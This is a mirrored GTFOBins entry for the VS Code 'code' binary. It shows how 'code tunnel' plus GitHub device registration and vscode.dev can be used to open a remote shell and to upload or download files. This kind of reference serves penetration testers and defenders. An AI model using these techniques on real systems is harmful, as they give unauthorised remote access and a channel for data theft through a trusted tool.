1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-06-06 22:36:04 +02:00
GTFOBins.github.io/_gtfobins/code.md
2023-09-25 15:59:18 +02:00

1.0 KiB

functions
reverse-shell file-upload file-download
description code
Create a tunnel to `vscode.dev`, then complete Github device registration and browse `https://vscode.dev/tunnel/my-tunnel-name`. Select `View \ Terminal` to spawn a shell on remote. code tunnel -name 'my-tunnel-name'
description code
Create a tunnel to `vscode.dev`, then complete Github device registration and browse `https://vscode.dev/tunnel/my-tunnel-name`. In the `Explorer` tab, select `Open Folder`, then right-click on the folder and select `Upload`. Select file from the local file browser. code tunnel -name 'my-tunnel-name'
description code
Create a tunnel to `vscode.dev`, then complete Github device registration and browse `https://vscode.dev/tunnel/my-tunnel-name`. In the `Explorer` tab, select `Open Folder`, then select a file, right-click and select `Download`. code tunnel -name 'my-tunnel-name'